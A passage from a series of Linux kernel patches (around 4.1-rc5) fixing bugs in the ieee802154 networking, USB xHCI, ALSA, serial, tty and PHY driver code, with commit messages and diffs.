nla_get_u8(info->attrs[IEEE802154_ATTR_REASON])); diff --git a/net/ieee802154/socket.c b/net/ieee802154/socket.c index 7aaaf967df58..e5cc2537c2a3 100644 --- a/net/ieee802154/socket.c +++ b/net/ieee802154/socket.c @@ -64,10 +64,8 @@ ieee802154_get_dev(struct net *net, const struct ieee802154_addr *addr) if (tmp->type != ARPHRD_IEEE802154) continue; - pan_id = ieee802154_mlme_ops(tmp)->get_pan_id(tmp); - short_addr = - ieee802154_mlme_ops(tmp)->get_short_addr(tmp); - + pan_id = tmp->ieee802154_ptr->pan_id; + short_addr = tmp->ieee802154_ptr->short_addr; if (pan_id == addr->pan_id && short_addr == addr->short_addr) { dev = tmp; @@ -797,9 +795,9 @@ static int ieee802154_dgram_deliver(struct net_device *dev, struct sk_buff *skb) /* Data frame processing */ BUG_ON(dev->type != ARPHRD_IEEE802154); - pan_id = ieee802154_mlme_ops(dev)->get_pan_id(dev); - short_addr = ieee802154_mlme_ops(dev)->get_short_addr(dev); - hw_addr = ieee802154_devaddr_from_raw(dev->dev_addr); + pan_id = dev->ieee802154_ptr->pan_id; + short_addr = dev->ieee802154_ptr->short_addr; + hw_addr = dev->ieee802154_ptr->extended_addr; read_lock(&dgram_lock); sk_for_each(sk, &dgram_head) { diff --git a/net/mac802154/ieee802154_i.h b/net/mac802154/ieee802154_i.h index 56b3847466e9..eec668f3637f 100644 --- a/net/mac802154/ieee802154_i.h +++ b/net/mac802154/ieee802154_i.h @@ -86,8 +86,6 @@ struct ieee802154_sub_if_data { unsigned long state; char name[IFNAMSIZ]; - spinlock_t mib_lock; - /* protects sec from concurrent access by netlink. access by * encrypt/decrypt/header_create safe without additional protection. */ @@ -136,10 +134,6 @@ ieee802154_subif_start_xmit(struct sk_buff *skb, struct net_device *dev); enum hrtimer_restart ieee802154_xmit_ifs_timer(struct hrtimer *timer); /* MIB callbacks */ -void mac802154_dev_set_short_addr(struct net_device *dev, __le16 val); -__le16 mac802154_dev_get_short_addr(const struct net_device *dev); -__le16 mac802154_dev_get_pan_id(const struct net_device *dev); -void mac802154_dev_set_pan_id(struct net_device *dev, __le16 val); void mac802154_dev_set_page_channel(struct net_device *dev, u8 page, u8 chan); int mac802154_get_params(struct net_device *dev, diff --git a/net/mac802154/iface.c b/net/mac802154/iface.c index 0ec7bc402e29..f30788d2702f 100644 --- a/net/mac802154/iface.c +++ b/net/mac802154/iface.c @@ -63,7 +63,6 @@ mac802154_wpan_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd) int err = -ENOIOCTLCMD; rtnl_lock(); - spin_lock_bh(&sdata->mib_lock); switch (cmd) { case SIOCGIFADDR: @@ -88,7 +87,6 @@ mac802154_wpan_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd) } case SIOCSIFADDR: if (netif_running(dev)) { - spin_unlock_bh(&sdata->mib_lock); rtnl_unlock(); return -EBUSY; } @@ -111,7 +109,6 @@ mac802154_wpan_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd) break; } - spin_unlock_bh(&sdata->mib_lock); rtnl_unlock(); return err; } @@ -374,8 +371,6 @@ static int mac802154_header_create(struct sk_buff *skb, return -EINVAL; if (!saddr) { - spin_lock_bh(&sdata->mib_lock); - if (wpan_dev->short_addr == cpu_to_le16(IEEE802154_ADDR_BROADCAST) || wpan_dev->short_addr == cpu_to_le16(IEEE802154_ADDR_UNDEF) || wpan_dev->pan_id == cpu_to_le16(IEEE802154_PANID_BROADCAST)) { @@ -387,8 +382,6 @@ static int mac802154_header_create(struct sk_buff *skb, } hdr.source.pan_id = wpan_dev->pan_id; - - spin_unlock_bh(&sdata->mib_lock); } else { hdr.source = *(const struct ieee802154_addr *)saddr; } @@ -500,7 +493,6 @@ ieee802154_setup_sdata(struct ieee802154_sub_if_data *sdata, 
sdata->dev->ml_priv = &mac802154_mlme_wpan; wpan_dev->promiscuous_mode = false; - spin_lock_init(&sdata->mib_lock); mutex_init(&sdata->sec_mtx); mac802154_llsec_init(&sdata->sec); diff --git a/net/mac802154/mac_cmd.c b/net/mac802154/mac_cmd.c index 3b347d4d3d4c..5220c2b2735b 100644 --- a/net/mac802154/mac_cmd.c +++ b/net/mac802154/mac_cmd.c @@ -43,8 +43,8 @@ static int mac802154_mlme_start_req(struct net_device *dev, BUG_ON(addr->mode != IEEE802154_ADDR_SHORT); - mac802154_dev_set_pan_id(dev, addr->pan_id); - mac802154_dev_set_short_addr(dev, addr->short_addr); + dev->ieee802154_ptr->pan_id = addr->pan_id; + dev->ieee802154_ptr->short_addr = addr->short_addr; mac802154_dev_set_page_channel(dev, page, channel); if (ops->llsec) { @@ -151,8 +151,6 @@ static struct ieee802154_llsec_ops mac802154_llsec_ops = { struct ieee802154_mlme_ops mac802154_mlme_wpan = { .start_req = mac802154_mlme_start_req, - .get_pan_id = mac802154_dev_get_pan_id, - .get_short_addr = mac802154_dev_get_short_addr, .llsec = &mac802154_llsec_ops, diff --git a/net/mac802154/mib.c b/net/mac802154/mib.c index 00a62de9cc23..73f94fbf8785 100644 --- a/net/mac802154/mib.c +++ b/net/mac802154/mib.c @@ -26,56 +26,6 @@ #include "ieee802154_i.h" #include "driver-ops.h" -void mac802154_dev_set_short_addr(struct net_device *dev, __le16 val) -{ - struct ieee802154_sub_if_data *sdata = IEEE802154_DEV_TO_SUB_IF(dev); - - BUG_ON(dev->type != ARPHRD_IEEE802154); - - spin_lock_bh(&sdata->mib_lock); - sdata->wpan_dev.short_addr = val; - spin_unlock_bh(&sdata->mib_lock); -} - -__le16 mac802154_dev_get_short_addr(const struct net_device *dev) -{ - struct ieee802154_sub_if_data *sdata = IEEE802154_DEV_TO_SUB_IF(dev); - __le16 ret; - - BUG_ON(dev->type != ARPHRD_IEEE802154); - - spin_lock_bh(&sdata->mib_lock); - ret = sdata->wpan_dev.short_addr; - spin_unlock_bh(&sdata->mib_lock); - - return ret; -} - -__le16 mac802154_dev_get_pan_id(const struct net_device *dev) -{ - struct ieee802154_sub_if_data *sdata = IEEE802154_DEV_TO_SUB_IF(dev); - __le16 ret; - - BUG_ON(dev->type != ARPHRD_IEEE802154); - - spin_lock_bh(&sdata->mib_lock); - ret = sdata->wpan_dev.pan_id; - spin_unlock_bh(&sdata->mib_lock); - - return ret; -} - -void mac802154_dev_set_pan_id(struct net_device *dev, __le16 val) -{ - struct ieee802154_sub_if_data *sdata = IEEE802154_DEV_TO_SUB_IF(dev); - - BUG_ON(dev->type != ARPHRD_IEEE802154); - - spin_lock_bh(&sdata->mib_lock); - sdata->wpan_dev.pan_id = val; - spin_unlock_bh(&sdata->mib_lock); -} - void mac802154_dev_set_page_channel(struct net_device *dev, u8 page, u8 chan) { struct ieee802154_sub_if_data *sdata = IEEE802154_DEV_TO_SUB_IF(dev); diff --git a/net/mac802154/rx.c b/net/mac802154/rx.c index c0d67b2b4132..e0f10063cac3 100644 --- a/net/mac802154/rx.c +++ b/net/mac802154/rx.c @@ -47,8 +47,6 @@ ieee802154_subif_frame(struct ieee802154_sub_if_data *sdata, pr_debug("getting packet via slave interface %s\n", sdata->dev->name); - spin_lock_bh(&sdata->mib_lock); - span = wpan_dev->pan_id; sshort = wpan_dev->short_addr; @@ -83,13 +81,10 @@ ieee802154_subif_frame(struct ieee802154_sub_if_data *sdata, skb->pkt_type = PACKET_OTHERHOST; break; default: - spin_unlock_bh(&sdata->mib_lock); pr_debug("invalid dest mode\n"); goto fail; } - spin_unlock_bh(&sdata->mib_lock); - skb->dev = sdata->dev; rc = mac802154_llsec_decrypt(&sdata->sec, skb); From ae425bb2a05bebe786a25cc8ae64e9d16c4d9b83 Mon Sep 17 00:00:00 2001 From: "Vittorio G (VittGam)" Date: Fri, 22 May 2015 21:15:19 +0200 Subject: [PATCH 170/872] ALSA: usb-audio: Add quirk for MS 
LifeCam HD-3000 Microsoft LifeCam HD-3000 (045e:0779) needs a similar quirk for suppressing the unsupported sample rate inquiry. Bugzilla: https://bugzilla.kernel.org/show_bug.cgi?id=98481 Cc: Signed-off-by: Vittorio Gambaletta Signed-off-by: Takashi Iwai --- sound/usb/quirks.c | 1 + 1 file changed, 1 insertion(+) diff --git a/sound/usb/quirks.c b/sound/usb/quirks.c index 46facfc9aec1..29175346cc4f 100644 --- a/sound/usb/quirks.c +++ b/sound/usb/quirks.c @@ -1118,6 +1118,7 @@ bool snd_usb_get_sample_rate_quirk(struct snd_usb_audio *chip) case USB_ID(0x045E, 0x075D): /* MS Lifecam Cinema */ case USB_ID(0x045E, 0x076D): /* MS Lifecam HD-5000 */ case USB_ID(0x045E, 0x0772): /* MS Lifecam Studio */ + case USB_ID(0x045E, 0x0779): /* MS Lifecam HD-3000 */ case USB_ID(0x04D8, 0xFEEA): /* Benchmark DAC1 Pre */ return true; } From 3530febb5c7636f6b26d15637f68296804d26491 Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Sun, 24 May 2015 08:27:52 +0200 Subject: [PATCH 171/872] Revert "ALSA: hda - Add mute-LED mode control to Thinkpad" MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This reverts commit 7290006d8c0900c56d8c58428134f02c35109d17. Through the regression report, it was revealed that the tpacpi_led_set() call to thinkpad_acpi helper doesn't only toggle the mute LED but actually mutes the sound. This is contradiction to the expectation, and rather confuses user. According to Henrique, it's not trivial to judge which TP model behaves "LED-only" and which model does whatever more intrusive, as Lenovo's implementations vary model by model. So, from the safety reason, we should revert the patch for now. Reported-by: Martin Steigerwald Cc: Pali Rohár Cc: Signed-off-by: Takashi Iwai --- sound/pci/hda/thinkpad_helper.c | 1 - 1 file changed, 1 deletion(-) diff --git a/sound/pci/hda/thinkpad_helper.c b/sound/pci/hda/thinkpad_helper.c index d51703e30523..0a4ad5feb82e 100644 --- a/sound/pci/hda/thinkpad_helper.c +++ b/sound/pci/hda/thinkpad_helper.c @@ -72,7 +72,6 @@ static void hda_fixup_thinkpad_acpi(struct hda_codec *codec, if (led_set_func(TPACPI_LED_MUTE, false) >= 0) { old_vmaster_hook = spec->vmaster_mute.hook; spec->vmaster_mute.hook = update_tpacpi_mute_led; - spec->vmaster_mute_enum = 1; removefunc = false; } if (led_set_func(TPACPI_LED_MICMUTE, false) >= 0) { From b04c846ceaad42f9e37f3626c7e8f457603863f0 Mon Sep 17 00:00:00 2001 From: Arthur Demchenkov Date: Tue, 19 May 2015 16:30:50 +0300 Subject: [PATCH 172/872] usb: make module xhci_hcd removable Fixed regression. After commit 29e409f0f761 ("xhci: Allow xHCI drivers to be built as separate modules") the module xhci_hcd became non-removable. That behaviour is not expected and there're no notes about it in commit message. The module should be removable as it blocks PM suspend/resume functions (Debian Bug#666406). Signed-off-by: Arthur Demchenkov Reviewed-by: Andrew Bresticker Cc: # v3.18+ Signed-off-by: Mathias Nyman Signed-off-by: Greg Kroah-Hartman --- drivers/usb/host/xhci.c | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/drivers/usb/host/xhci.c b/drivers/usb/host/xhci.c index ec8ac1674854..4299cbf47793 100644 --- a/drivers/usb/host/xhci.c +++ b/drivers/usb/host/xhci.c @@ -5011,4 +5011,12 @@ static int __init xhci_hcd_init(void) BUILD_BUG_ON(sizeof(struct xhci_run_regs) != (8+8*128)*32/8); return 0; } + +/* + * If an init function is provided, an exit function must also be provided + * to allow module unload. 
+ */ +static void __exit xhci_hcd_fini(void) { } + module_init(xhci_hcd_init); +module_exit(xhci_hcd_fini); From a00918d0521df1c7a2ec9143142a3ea998c8526d Mon Sep 17 00:00:00 2001 From: Chris Bainbridge Date: Tue, 19 May 2015 16:30:51 +0300 Subject: [PATCH 173/872] usb: host: xhci: add mutex for non-thread-safe data Regression in commit 638139eb95d2 ("usb: hub: allow to process more usb hub events in parallel") The regression resulted in intermittent failure to initialise a 10-port hub (with three internal VL812 4-port hub controllers) on boot, with a failure rate of around 8%, due to multiple race conditions when accessing addr_dev and slot_id in struct xhci_hcd. This regression also exposed a problem with xhci_setup_device, which "should be protected by the usb_address0_mutex" but no longer is due to commit 6fecd4f2a58c ("USB: separate usb_address0 mutexes for each bus") With separate buses (and locks) it is no longer the case that a single lock will protect xhci_setup_device from accesses by two parallel threads processing events on the two buses. Fix this by adding a mutex to protect addr_dev and slot_id in struct xhci_hcd, and by making the assignment of slot_id atomic. Fixes multiple boot errors: [ 0.583008] xhci_hcd 0000:00:14.0: Bad Slot ID 2 [ 0.583009] xhci_hcd 0000:00:14.0: Could not allocate xHCI USB device data structures [ 0.583012] usb usb1-port3: couldn't allocate usb_device And: [ 0.637409] xhci_hcd 0000:00:14.0: Error while assigning device slot ID [ 0.637417] xhci_hcd 0000:00:14.0: Max number of devices this xHCI host supports is 32. [ 0.637421] usb usb1-port1: couldn't allocate usb_device And: [ 0.753372] xhci_hcd 0000:00:14.0: ERROR: unexpected setup context command completion code 0x0. [ 0.753373] usb 1-3: hub failed to enable device, error -22 [ 0.753400] xhci_hcd 0000:00:14.0: Error while assigning device slot ID [ 0.753402] xhci_hcd 0000:00:14.0: Max number of devices this xHCI host supports is 32. [ 0.753403] usb usb1-port3: couldn't allocate usb_device And: [ 11.018386] usb 1-3: device descriptor read/all, error -110 And: [ 5.753838] xhci_hcd 0000:00:14.0: Timeout while waiting for setup device command Tested with 200 reboots, resulting in no USB hub init related errors. 
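[Editorial note] The race described above is the classic one of two threads sharing a single result slot (xhci->slot_id and the addr_dev completion). The fix serializes command submission with a mutex and copies the result into a local variable before dropping the lock. A condensed user-space sketch of that pattern follows; pthread primitives replace the xHCI command machinery and all names (alloc_slot, complete_cmd, struct ctrl) are invented for the illustration.

/* Sketch: serialize the command, copy the shared result under the lock. */
#include <pthread.h>
#include <stdio.h>

static struct ctrl {
	pthread_mutex_t mutex;	/* like xhci->mutex: one command at a time */
	pthread_mutex_t lock;	/* protects the completion state */
	pthread_cond_t done;
	int completed;
	int slot_id;		/* the shared, non-thread-safe result slot */
} hc = {
	.mutex = PTHREAD_MUTEX_INITIALIZER,
	.lock = PTHREAD_MUTEX_INITIALIZER,
	.done = PTHREAD_COND_INITIALIZER,
};

/* Simulated completion handler (would run from the event ring). */
static void *complete_cmd(void *arg)
{
	pthread_mutex_lock(&hc.lock);
	hc.slot_id = (int)(long)arg;
	hc.completed = 1;
	pthread_cond_signal(&hc.done);
	pthread_mutex_unlock(&hc.lock);
	return NULL;
}

static int alloc_slot(int want)
{
	pthread_t t;
	int slot;

	/* Hold the mutex across submit + wait + read, and take a local
	 * copy of the result before releasing it. */
	pthread_mutex_lock(&hc.mutex);
	hc.completed = 0;
	pthread_create(&t, NULL, complete_cmd, (void *)(long)want);

	pthread_mutex_lock(&hc.lock);
	while (!hc.completed)
		pthread_cond_wait(&hc.done, &hc.lock);
	slot = hc.slot_id;	/* like slot_id = xhci->slot_id in the patch */
	pthread_mutex_unlock(&hc.lock);
	pthread_mutex_unlock(&hc.mutex);

	pthread_join(t, NULL);
	return slot;
}

int main(void)
{
	printf("got slot %d\n", alloc_slot(1));
	return 0;
}

Without the outer mutex, two hubs enumerating in parallel can each see the other's slot_id, which is exactly the "Bad Slot ID" and "Error while assigning device slot ID" symptoms quoted above.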
Fixes: 638139eb95d2 ("usb: hub: allow to process more usb hub events in parallel") Link: https://lkml.kernel.org/g/CAP-bSRb=A0iEYobdGCLpwynS7pkxpt_9ZnwyZTPVAoy0Y=Zo3Q@mail.gmail.com Signed-off-by: Chris Bainbridge Cc: # 3.18+ [changed git commit description style for checkpatch -Mathias] Signed-off-by: Mathias Nyman Signed-off-by: Greg Kroah-Hartman --- drivers/usb/host/xhci.c | 49 +++++++++++++++++++++++++---------------- drivers/usb/host/xhci.h | 2 ++ 2 files changed, 32 insertions(+), 19 deletions(-) diff --git a/drivers/usb/host/xhci.c b/drivers/usb/host/xhci.c index 4299cbf47793..36bf089b708f 100644 --- a/drivers/usb/host/xhci.c +++ b/drivers/usb/host/xhci.c @@ -3682,18 +3682,21 @@ int xhci_alloc_dev(struct usb_hcd *hcd, struct usb_device *udev) { struct xhci_hcd *xhci = hcd_to_xhci(hcd); unsigned long flags; - int ret; + int ret, slot_id; struct xhci_command *command; command = xhci_alloc_command(xhci, false, false, GFP_KERNEL); if (!command) return 0; + /* xhci->slot_id and xhci->addr_dev are not thread-safe */ + mutex_lock(&xhci->mutex); spin_lock_irqsave(&xhci->lock, flags); command->completion = &xhci->addr_dev; ret = xhci_queue_slot_control(xhci, command, TRB_ENABLE_SLOT, 0); if (ret) { spin_unlock_irqrestore(&xhci->lock, flags); + mutex_unlock(&xhci->mutex); xhci_dbg(xhci, "FIXME: allocate a command ring segment\n"); kfree(command); return 0; @@ -3702,8 +3705,10 @@ int xhci_alloc_dev(struct usb_hcd *hcd, struct usb_device *udev) spin_unlock_irqrestore(&xhci->lock, flags); wait_for_completion(command->completion); + slot_id = xhci->slot_id; + mutex_unlock(&xhci->mutex); - if (!xhci->slot_id || command->status != COMP_SUCCESS) { + if (!slot_id || command->status != COMP_SUCCESS) { xhci_err(xhci, "Error while assigning device slot ID\n"); xhci_err(xhci, "Max number of devices this xHCI host supports is %u.\n", HCS_MAX_SLOTS( @@ -3728,11 +3733,11 @@ int xhci_alloc_dev(struct usb_hcd *hcd, struct usb_device *udev) * xhci_discover_or_reset_device(), which may be called as part of * mass storage driver error handling. 
*/ - if (!xhci_alloc_virt_device(xhci, xhci->slot_id, udev, GFP_NOIO)) { + if (!xhci_alloc_virt_device(xhci, slot_id, udev, GFP_NOIO)) { xhci_warn(xhci, "Could not allocate xHCI USB device data structures\n"); goto disable_slot; } - udev->slot_id = xhci->slot_id; + udev->slot_id = slot_id; #ifndef CONFIG_USB_DEFAULT_PERSIST /* @@ -3778,12 +3783,15 @@ static int xhci_setup_device(struct usb_hcd *hcd, struct usb_device *udev, struct xhci_slot_ctx *slot_ctx; struct xhci_input_control_ctx *ctrl_ctx; u64 temp_64; - struct xhci_command *command; + struct xhci_command *command = NULL; + + mutex_lock(&xhci->mutex); if (!udev->slot_id) { xhci_dbg_trace(xhci, trace_xhci_dbg_address, "Bad Slot ID %d", udev->slot_id); - return -EINVAL; + ret = -EINVAL; + goto out; } virt_dev = xhci->devs[udev->slot_id]; @@ -3796,7 +3804,8 @@ static int xhci_setup_device(struct usb_hcd *hcd, struct usb_device *udev, */ xhci_warn(xhci, "Virt dev invalid for slot_id 0x%x!\n", udev->slot_id); - return -EINVAL; + ret = -EINVAL; + goto out; } if (setup == SETUP_CONTEXT_ONLY) { @@ -3804,13 +3813,15 @@ static int xhci_setup_device(struct usb_hcd *hcd, struct usb_device *udev, if (GET_SLOT_STATE(le32_to_cpu(slot_ctx->dev_state)) == SLOT_STATE_DEFAULT) { xhci_dbg(xhci, "Slot already in default state\n"); - return 0; + goto out; } } command = xhci_alloc_command(xhci, false, false, GFP_KERNEL); - if (!command) - return -ENOMEM; + if (!command) { + ret = -ENOMEM; + goto out; + } command->in_ctx = virt_dev->in_ctx; command->completion = &xhci->addr_dev; @@ -3820,8 +3831,8 @@ static int xhci_setup_device(struct usb_hcd *hcd, struct usb_device *udev, if (!ctrl_ctx) { xhci_warn(xhci, "%s: Could not get input context, bad type.\n", __func__); - kfree(command); - return -EINVAL; + ret = -EINVAL; + goto out; } /* * If this is the first Set Address since device plug-in or @@ -3848,8 +3859,7 @@ static int xhci_setup_device(struct usb_hcd *hcd, struct usb_device *udev, spin_unlock_irqrestore(&xhci->lock, flags); xhci_dbg_trace(xhci, trace_xhci_dbg_address, "FIXME: allocate a command ring segment"); - kfree(command); - return ret; + goto out; } xhci_ring_cmd_db(xhci); spin_unlock_irqrestore(&xhci->lock, flags); @@ -3896,10 +3906,8 @@ static int xhci_setup_device(struct usb_hcd *hcd, struct usb_device *udev, ret = -EINVAL; break; } - if (ret) { - kfree(command); - return ret; - } + if (ret) + goto out; temp_64 = xhci_read_64(xhci, &xhci->op_regs->dcbaa_ptr); xhci_dbg_trace(xhci, trace_xhci_dbg_address, "Op regs DCBAA ptr = %#016llx", temp_64); @@ -3932,8 +3940,10 @@ static int xhci_setup_device(struct usb_hcd *hcd, struct usb_device *udev, xhci_dbg_trace(xhci, trace_xhci_dbg_address, "Internal device address = %d", le32_to_cpu(slot_ctx->dev_state) & DEV_ADDR_MASK); +out: + mutex_unlock(&xhci->mutex); kfree(command); - return 0; + return ret; } int xhci_address_device(struct usb_hcd *hcd, struct usb_device *udev) @@ -4855,6 +4865,7 @@ int xhci_gen_setup(struct usb_hcd *hcd, xhci_get_quirks_t get_quirks) return 0; } + mutex_init(&xhci->mutex); xhci->cap_regs = hcd->regs; xhci->op_regs = hcd->regs + HC_LENGTH(readl(&xhci->cap_regs->hc_capbase)); diff --git a/drivers/usb/host/xhci.h b/drivers/usb/host/xhci.h index ea75e8ccd3c1..6977f8491fa7 100644 --- a/drivers/usb/host/xhci.h +++ b/drivers/usb/host/xhci.h @@ -1497,6 +1497,8 @@ struct xhci_hcd { struct list_head lpm_failed_devs; /* slot enabling and address device helpers */ + /* these are not thread safe so use mutex */ + struct mutex mutex; struct completion addr_dev; int slot_id; /* For USB 
3.0 LPM enable/disable. */ From 43dd1f9a5b05d6db2cb258354a01ace63baa5c0b Mon Sep 17 00:00:00 2001 From: Dave Martin Date: Thu, 21 May 2015 16:37:49 +0100 Subject: [PATCH 174/872] serial/amba-pl011: Unconditionally poll for FIFO space before each TX char Commit 734745caeb9f155ab58918834a8c70e83fa6afd3 serial/amba-pl011: (Activate TX IRQ passively) introduces a race which causes the driver sometimes to attempt to write a character to the TX FIFO when the FIFO is already full. The PL011 does not guarantee its behaviour when the FIFO is overfilled. In practice, this can cause duplicate and/or dropped characters to be output on the wire. The problem is common enough to be readily observable on the ARM Juno platform when the PL011 UART is used as the console and DMA is not in use. This patch fixes this problem by always polling for space before each character is written to the FIFO. This will be amended to a less brute-force approach in a later commit, but this patch should help ensure correct behaviour for now. Signed-off-by: Dave Martin Signed-off-by: Greg Kroah-Hartman --- drivers/tty/serial/amba-pl011.c | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/drivers/tty/serial/amba-pl011.c b/drivers/tty/serial/amba-pl011.c index 6f5a0720a8c8..763eb20fe321 100644 --- a/drivers/tty/serial/amba-pl011.c +++ b/drivers/tty/serial/amba-pl011.c @@ -1249,20 +1249,19 @@ __acquires(&uap->port.lock) /* * Transmit a character - * There must be at least one free entry in the TX FIFO to accept the char. * - * Returns true if the FIFO might have space in it afterwards; - * returns false if the FIFO definitely became full. + * Returns true if the character was successfully queued to the FIFO. + * Returns false otherwise. */ static bool pl011_tx_char(struct uart_amba_port *uap, unsigned char c) { + if (readw(uap->port.membase + UART01x_FR) & UART01x_FR_TXFF) + return false; /* unable to transmit character */ + writew(c, uap->port.membase + UART01x_DR); uap->port.icount.tx++; - if (likely(uap->tx_irq_seen > 1)) - return true; - - return !(readw(uap->port.membase + UART01x_FR) & UART01x_FR_TXFF); + return true; } static bool pl011_tx_chars(struct uart_amba_port *uap) @@ -1296,7 +1295,8 @@ static bool pl011_tx_chars(struct uart_amba_port *uap) return false; if (uap->port.x_char) { - pl011_tx_char(uap, uap->port.x_char); + if (!pl011_tx_char(uap, uap->port.x_char)) + goto done; uap->port.x_char = 0; --count; } From 392bceedb107a3dc1d4287e63d7670d08f702feb Mon Sep 17 00:00:00 2001 From: Philipp Zabel Date: Tue, 19 May 2015 10:54:09 +0200 Subject: [PATCH 175/872] serial: imx: Fix DMA handling for IDLE condition aborts The driver configures the IDLE condition to interrupt the SDMA engine. Since the SDMA UART ROM script doesn't clear the IDLE bit itself, this caused repeated 1-byte DMA transfers, regardless of available data in the RX FIFO. Also, when returning due to the IDLE condition, the UART ROM script already increased its counter, causing residue to be off by one. This patch clears the IDLE condition to avoid repeated 1-byte DMA transfers and decreases count by when the DMA transfer was aborted due to the IDLE condition, fixing serial transfers using DMA on i.MX6Q. 
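[Editorial note] The arithmetic in this fix is small but easy to get wrong: the received byte count is derived from the DMA residue, and when the transfer was cut short by the IDLE condition the ROM script has already counted one byte too many, so the count must be decremented and the IDLE status written back to clear it. A minimal sketch of that bookkeeping follows; read_status() and ack_idle() are hypothetical register helpers, and the USR2_IDLE bit value is assumed here for illustration only.

/* Illustrative residue bookkeeping, not the imx driver itself. */
#include <stdio.h>

#define RX_BUF_SIZE 4096
#define USR2_IDLE   (1u << 12)		/* assumed bit position */

static unsigned int read_status(void) { return USR2_IDLE; }	/* mock */
static void ack_idle(void) { puts("IDLE condition cleared"); }	/* mock */

static unsigned int rx_bytes_from_residue(unsigned int residue)
{
	unsigned int count = RX_BUF_SIZE - residue;

	if (read_status() & USR2_IDLE) {
		/* Transfer ended on IDLE: the counter ran one byte ahead.
		 * The driver decrements unconditionally (IDLE implies at
		 * least one counted byte); the guard here only keeps this
		 * stand-alone sketch from underflowing on mock input. */
		if (count)
			count--;
		/* Write the bit back so the next DMA isn't another 1-byte
		 * transfer triggered by the still-pending IDLE condition. */
		ack_idle();
	}
	return count;
}

int main(void)
{
	printf("received %u bytes\n", rx_bytes_from_residue(4000));
	return 0;
}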
Reported-by: Peter Seiderer Signed-off-by: Philipp Zabel Tested-by: Fabio Estevam Cc: stable Signed-off-by: Greg Kroah-Hartman --- drivers/tty/serial/imx.c | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/drivers/tty/serial/imx.c b/drivers/tty/serial/imx.c index c8cfa0637128..88250395b0ce 100644 --- a/drivers/tty/serial/imx.c +++ b/drivers/tty/serial/imx.c @@ -911,6 +911,14 @@ static void dma_rx_callback(void *data) status = dmaengine_tx_status(chan, (dma_cookie_t)0, &state); count = RX_BUF_SIZE - state.residue; + + if (readl(sport->port.membase + USR2) & USR2_IDLE) { + /* In condition [3] the SDMA counted up too early */ + count--; + + writel(USR2_IDLE, sport->port.membase + USR2); + } + dev_dbg(sport->port.dev, "We get %d bytes.\n", count); if (count) { From da555db6b06340e3f6b4b0a0448c30bebfe23b0a Mon Sep 17 00:00:00 2001 From: Mark Tomlinson Date: Mon, 18 May 2015 12:01:48 +1200 Subject: [PATCH 176/872] n_tty: Fix calculation of size in canon_copy_from_read_buf There was a hardcoded value of 4096 which should have been N_TTY_BUF_SIZE. This caused reads from tty to fail with EFAULT when they shouldn't have done if N_TTY_BUF_SIZE was declared to be something other than 4096. Signed-off-by: Mark Tomlinson Reviewed-by: Peter Hurley Signed-off-by: Greg Kroah-Hartman --- drivers/tty/n_tty.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/tty/n_tty.c b/drivers/tty/n_tty.c index cc57a3a6b02b..759604e57b24 100644 --- a/drivers/tty/n_tty.c +++ b/drivers/tty/n_tty.c @@ -2070,8 +2070,8 @@ static int canon_copy_from_read_buf(struct tty_struct *tty, size = N_TTY_BUF_SIZE - tail; n = eol - tail; - if (n > 4096) - n += 4096; + if (n > N_TTY_BUF_SIZE) + n += N_TTY_BUF_SIZE; n += found; c = n; From ba155e2d21f6bf05de86a78dbe5bfd8757604a65 Mon Sep 17 00:00:00 2001 From: Linus Torvalds Date: Sun, 24 May 2015 18:22:35 -0700 Subject: [PATCH 177/872] Linux 4.1-rc5 --- Makefile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Makefile b/Makefile index dc20bcb9b271..92a707859205 100644 --- a/Makefile +++ b/Makefile @@ -1,7 +1,7 @@ VERSION = 4 PATCHLEVEL = 1 SUBLEVEL = 0 -EXTRAVERSION = -rc4 +EXTRAVERSION = -rc5 NAME = Hurr durr I'ma sheep # *DOCUMENTATION* From cc4a84c3da6f9dd6a297dc81fe4437643a60fe03 Mon Sep 17 00:00:00 2001 From: Florian Fainelli Date: Fri, 22 May 2015 14:07:30 -0700 Subject: [PATCH 178/872] net: phy: bcm7xxx: Fix 7425 PHY ID and flags While adding support for 7425 PHY in the 7xxx PHY driver, the ID that was used was actually coming from an external PHY: a BCM5461x. Fix this by using the proper ID for the internal 7425 PHY and set the PHY_IS_INTERNAL flag, otherwise consumers of this PHY driver would not be able to properly identify it as such. Fixes: d068b02cfdfc2 ("net: phy: add BCM7425 and BCM7429 PHYs") Signed-off-by: Florian Fainelli Reviewed-by: Petri Gynther Signed-off-by: David S. 
Miller --- drivers/net/phy/bcm7xxx.c | 2 +- include/linux/brcmphy.h | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/phy/bcm7xxx.c b/drivers/net/phy/bcm7xxx.c index 64c74c6a4828..b5dc59de094e 100644 --- a/drivers/net/phy/bcm7xxx.c +++ b/drivers/net/phy/bcm7xxx.c @@ -404,7 +404,7 @@ static struct phy_driver bcm7xxx_driver[] = { .name = "Broadcom BCM7425", .features = PHY_GBIT_FEATURES | SUPPORTED_Pause | SUPPORTED_Asym_Pause, - .flags = 0, + .flags = PHY_IS_INTERNAL, .config_init = bcm7xxx_config_init, .config_aneg = genphy_config_aneg, .read_status = genphy_read_status, diff --git a/include/linux/brcmphy.h b/include/linux/brcmphy.h index ae2982c0f7a6..656da2a12ffe 100644 --- a/include/linux/brcmphy.h +++ b/include/linux/brcmphy.h @@ -17,7 +17,7 @@ #define PHY_ID_BCM7250 0xae025280 #define PHY_ID_BCM7364 0xae025260 #define PHY_ID_BCM7366 0x600d8490 -#define PHY_ID_BCM7425 0x03625e60 +#define PHY_ID_BCM7425 0x600d86b0 #define PHY_ID_BCM7429 0x600d8730 #define PHY_ID_BCM7439 0x600d8480 #define PHY_ID_BCM7439_2 0xae025080 From 3f7352bf21f8fd7ba3e2fcef9488756f188e12be Mon Sep 17 00:00:00 2001 From: Alexei Starovoitov Date: Fri, 22 May 2015 15:42:55 -0700 Subject: [PATCH 179/872] x86: bpf_jit: fix compilation of large bpf programs x86 has variable length encoding. x86 JIT compiler is trying to pick the 